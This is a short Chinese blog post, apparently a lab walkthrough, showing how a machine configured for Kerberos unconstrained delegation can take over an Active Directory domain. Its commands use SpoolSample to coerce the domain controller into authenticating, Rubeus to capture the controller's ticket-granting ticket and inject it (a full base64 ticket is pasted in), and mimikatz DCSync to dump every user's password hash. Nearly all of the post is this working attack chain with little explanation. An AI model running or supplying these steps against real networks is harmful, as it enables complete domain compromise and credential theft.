非约束性委派机制可见:域内的三种委派方式_域控委派控制任务-CSDN博客
-
域控机器账户:WIN-0V0GAORDC17
-
攻击者机器:win10-01
-
配置 win10-01 的非约束性委派,如下图:
-
攻击者监听管理员发送的 tgt。
Rubeus.exe monitor /interval:1 /filteruser:WIN-0V0GAORDC17$
-
攻击者触发打印机漏洞使得域控主机回连访问攻击者机器。
SpoolSample.exe WIN-0V0GAORDC17 win10-01
-
由于非约束性委派的机制,域控访问 win10-01 域控主机需要发送 tgt ,我们使用打印机漏洞之后会立刻获得一个 base64 编码的域控机器账户的 tgt。
-
使用 Rubeus 将 base64 编码的 tgt 导入到会话中。
Rubeus.exe ptt /ticket:doIFbjCCBWqgAwIBBaEDAgEWooIEcTCCBG1hggRpMIIEZaADAgEFoQwbCkhBQ0tFUi5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBQ0tFUi5DT02jggQtMIIEKaADAgESoQMCAQKiggQbBIIEFzyfYta+DXkJcSQC4bz0C6ywbeeEr3u2767mPS/BfOCGcB6Oip5Q+MsS3iEa+Tmoxcdo87GtoPibvoiPcpeNrXwXe13l3qRrKHo8ZVUGtMU82dCWMOOp5lMIMvqhPpyJWdzvQ04rY9hUgjLbBH+JxNu94fuiU/DYGZ5y/2/H9clDLHCSk2VNZ7xcVfQI9muq/3bS+VopxfpLK48t62+/nDsoBOCINEZX3wwmOLFvKJgmuwJh3dRDZdZcRV/9uK3P2O61XATtdxpiPFpwBm8Wt0n6RxE4zKt6dkSaETS3AeFAst+7XdezdFPXd20HPmsvGfISm86pKnUqoUVHn6B0Zi23p353wLgKyV+4nRj6IhIWqkrZaMRHmqARdqoei8i+9U0qDbERc/6+Ke11Jl+6h9YAfbfl2iG+j/qXHit6GNXW8JxeKS1MtANAbkYU4ayfZV4pcPB96ByRuW0A5+lyWveeHWwyElet/jgk7ls+hysvo89Vmjv+A74OTqd2ei/puM9uvgeZWLYTd14U6vvy+Db3o9ADBYBsW6tMZPt5PewBxlfh35Exa8eysByb1rfHWhFeeQ8rMmM1nxmrZrphsIaxApeJD2s5lBlR4io7leTjh3C8Wwp0tTThKQXiGjtSRSoUX/SDGT8YkvFg7d3LjOCtdP78u0OFCMJJ/kyU9IOFtn3ShVF4ntKz1GHGa2IpB3KO0Ppuf++B6PP7BVYFhZJJeRlu/nTZKOawo6giAZB4Z86BGdP4iibab4iHE7WwRcc530+fywj6oyykwlm5hsclQfTWnJ/TNUKUvJo3XB/6MXnHRKgaQgVnEQR4dNnhuhCO8vuIrdzAkaJweg9kaOO0mS0IxSlgACh03sR12XnILpl4otasDgAznf03/zaaXtslPPT8DL5vPQv5mPkToN92PQjrUL8BpV4jFj3LC4xkcybMic512jVnjmhmOvIARG52uvkwtfzG8X0x2teUZSU0QSYa9iLAxzNDkZEj8pntl0kV9/HwJrpOyApsM8ubwRk4VkGi0hLWSJUH3Wm1wiStxrgxhT7Ik3YpWxfj/fRA1ngoN9Pu/+ITmJrXPKDVm6J/y6Da8/LLaRiC37SIL4JMXUfyxiQOOEVZqbyjGAeyKJS2VIreGL9mqFwNLCHYngjRGWhSOFz7qCtr8Kt2SAbDW6ZvJ6xVayvtydtRkPyCnh/R4HZ8uApF1QSL43MrjQbQCVcm8cRHNXWWsHC1Fb6dAgOv/6rL6725cMZYQfpFP+U7Zx2PQ29KZVtZJ/qjFWk8BIHhDpPtrdXMMDN/0lq1Zc1N5okwWItoJn0SArOtD5q74LTwucZciceS9+MU2I/4SZsknScSH76T4gj+CrbT2uHAZYrVqLWlt1hkJ9JxWqSQ28Wj0qOB6DCB5aADAgEAooHdBIHafYHXMIHUoIHRMIHOMIHLoCswKaADAgESoSIEIEIYpJGEvADSbwrlzlYtsPLSlXH5NQAMHV7pQJ9lZP+soQwbCkhBQ0tFUi5DT02iHTAboAMCAQGhFDASGxBXSU4tMFYwR0FPUkRDMTckowcDBQBgoQAApREYDzIwMjQxMjMxMDMzOTIzWqYRGA8yMDI0MTIzMTEzMzkyM1qnERgPMjAyNTAxMDcwMzM5MjNaqAwbCkhBQ0tFUi5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBQ0tFUi5DT00=
-
使用 mimikatz dump 域内用户的 hash。
lsadump::dcsync /all /csv
